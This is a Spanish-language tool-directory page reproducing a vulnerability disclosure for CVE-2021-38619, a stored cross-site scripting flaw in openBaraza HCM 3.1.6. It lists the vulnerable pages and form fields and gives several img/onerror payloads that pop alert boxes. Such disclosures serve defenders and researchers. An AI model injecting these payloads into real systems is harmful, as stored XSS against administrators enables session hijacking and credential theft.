Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-38619 | Kitploit
Herramientas/GitHubGitHub/charlesbickel/cve-2021-38619
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubcharlesbickel/cve-2021-38619

CVE-2021-38619

Ver Repositorio
1hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-38619 openBaraza HCM HR Payroll v.3.1.6 Vulnerabilidad de XSS almacenado no autenticado

openBaraza HCM v.3.1.6 no neutraliza adecuadamente la entrada controlable por el usuario, lo que podría permitir que un atacante remoto no autenticado realice un ataque de cross-site scripting (XSS) almacenado contra un usuario administrativo desde múltiples páginas. Si un atacante inyecta una carga útil de JavaScript arbitraria en las páginas vulnerables y los usuarios legítimos intentan visitar las páginas afectadas, la carga útil se ejecutará. Esto podría dar lugar al robo de credenciales, al secuestro de sesión o a la entrega de malware a la víctima.

Créditos a los descubridores: Charles Bickel y Gideon Gray


Página vulnerable: http://serverip:9090/hr/application.jsp

Cuadros de texto vulnerables: first_name, surname, email

Cargas útiles:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('First');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('Surname');" />
  • [email protected]<img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Página afectada: http://serverip:9090/hr/index.jsp?view=23:0

application.jsp


Página vulnerable: http://serverip:9090/hr/subscription.jsp

Cuadros de texto vulnerables: business_name, primary_contact, primary_email, confirm_email

Cargas útiles:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('business');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('contact');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Página afectada: http://serverip:9090/hr/index.jsp?view=94:0

subscription.jsp

Descargar herramienta